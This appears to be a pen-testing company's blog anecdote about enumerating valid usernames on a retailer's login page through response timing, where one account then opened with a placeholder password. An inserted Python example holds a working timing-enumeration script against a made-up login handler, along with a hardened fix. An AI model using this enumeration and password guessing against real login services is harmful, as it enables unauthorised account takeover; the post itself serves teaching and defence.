Each year, Rapid7 penetration testers complete hundreds of internally and externally based penetration testing service engagements. This post is part of an ongoing series featuring testimonials of what goes on beneath the hoodie. For more insights, check out our 2019 Under the Hoodie report.
One day, we were working on a web application penetration test for an online retailer client. While testing the login process with the client's prior written consent, it looked like we were able to identify valid usernames through response times: failed logins for accounts that existed took measurably longer than failed logins for accounts that did not.
To get a nice, thorough proof of concept, we combined some common email domains with common first and last names to build a decent-sized list of candidate usernames and enumerated against it. When doing user enumeration, it's good practice to first confirm every user you can and only worry about guessing passwords once you know which accounts are valid. So, we started enumeration using a single placeholder password: a short, simple word with no special characters, numbers, or capitalization.
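The procedure above, as an added example rather than anything from the client's application or Rapid7's tooling: a constructed login handler with the timing flaw (it returns immediately for unknown users and only runs the slow password hash for real ones), a hardened version that spends the same effort either way, and the tester side that builds the candidate list, times a placeholder-password attempt per candidate, and flags the usernames whose response times stand out from the crowd. The user table, passwords, domains, the 30,000-iteration PBKDF2 and the "5 MADs above the median" cutoff are all assumptions for the example.

```python
import hashlib
import hmac
import os
import statistics
import time
from itertools import product

# --- Constructed target (made up for this example) -----------------------------
PBKDF2_ITERATIONS = 30_000  # slow enough to measure, fast enough to run offline


def _hash_password(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)


def _make_user(password: str) -> dict:
    salt = os.urandom(16)
    return {"salt": salt, "hash": _hash_password(password, salt)}


USERS = {
    "alice.smith@example.com": _make_user("Correct-Horse-Battery-Staple"),
    "bob.jones@example.com": _make_user("welcome"),  # the kind of placeholder that got us in
}

# Dummy record with the same cost profile, so the hardened handler does the same
# amount of work whether or not the username exists.
_DUMMY_SALT = os.urandom(16)
_DUMMY_HASH = _hash_password("not-a-real-password", _DUMMY_SALT)


def login_vulnerable(username: str, password: str) -> bool:
    """Early return for unknown users: a failed login for a real account costs one
    PBKDF2 derivation, a failed login for an unknown account costs almost nothing."""
    user = USERS.get(username)
    if user is None:
        return False
    return hmac.compare_digest(_hash_password(password, user["salt"]), user["hash"])


def login_hardened(username: str, password: str) -> bool:
    """Always derives a hash and always compares in constant time; unknown
    usernames are checked against the dummy record so timing does not leak."""
    user = USERS.get(username)
    salt, expected = (user["salt"], user["hash"]) if user else (_DUMMY_SALT, _DUMMY_HASH)
    matches = hmac.compare_digest(_hash_password(password, salt), expected)
    return matches and user is not None


# --- Tester side ----------------------------------------------------------------
def candidate_emails(first_names, last_names, domains) -> list:
    """Guessed usernames: first.last@ and flast@ for every name pair and domain."""
    out = []
    for first, last in product(first_names, last_names):
        for domain in domains:
            out.append(f"{first}.{last}@{domain}")
            out.append(f"{first[0]}{last}@{domain}")
    return out


def time_login(login, username: str, password: str, rounds: int = 3) -> float:
    """Median wall-clock time in ms of `rounds` login attempts for one username."""
    samples = []
    for _ in range(rounds):
        start = time.perf_counter()
        login(username, password)
        samples.append((time.perf_counter() - start) * 1000)
    return statistics.median(samples)


def split_by_timing(medians: dict, k: float = 5.0, floor_ms: float = 1.0) -> set:
    """Return usernames whose median response time is an outlier above the rest.

    Most guessed usernames do not exist, so the population median and its median
    absolute deviation (MAD) describe the 'unknown user' response; anything more
    than k MADs above it is flagged as a likely valid account.
    """
    values = list(medians.values())
    center = statistics.median(values)
    mad = statistics.median(abs(v - center) for v in values) or floor_ms
    return {u for u, t in medians.items() if t > center + k * mad}


def enumerate_users(login, candidates, placeholder: str = "welcome") -> set:
    """Time one placeholder-password attempt per candidate and cluster the results."""
    return split_by_timing({u: time_login(login, u, placeholder) for u in candidates})


if __name__ == "__main__":
    candidates = candidate_emails(["alice", "bob", "carol", "dave"],
                                  ["smith", "jones", "lee"],
                                  ["example.com", "example.org"])
    print("vulnerable handler leaks:", sorted(enumerate_users(login_vulnerable, candidates)))
    print("hardened handler leaks:  ", sorted(enumerate_users(login_hardened, candidates)))
```

Run against the vulnerable handler, the two real accounts separate cleanly from the 46 nonexistent ones; against the hardened handler every candidate costs one PBKDF2 derivation and the set comes back empty. Note that the placeholder attempt can itself succeed, which is exactly what the story below describes, so check the return value of each attempt rather than assuming every login failed.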
At some point, the responses we got weren't what we were expecting. So, we went back through them and found that one login had actually succeeded with the placeholder password! The client wasn't really a fan of forcing users to choose complex passwords, but hopefully our accidental account compromise while demonstrating user enumeration was a good learning experience.
Interested in learning more about how Rapid7 pen testers conduct their assessments? Check back every week for a new story in the series.
- This One Time on a Pen Test: Paging Doctor Hackerman
- This One Time on a Pen Test: How I Compromised a Healthcare Portal Before My Hot Cocoa Went Cold
- This One Time on a Pen Test: Missed a Spot
- This One Time on a Pen Test: Nerds in the NERC
- This One Time on a Pen Test: The Pizza of Doom
- This One Time on a Pen Test: What’s in the Box?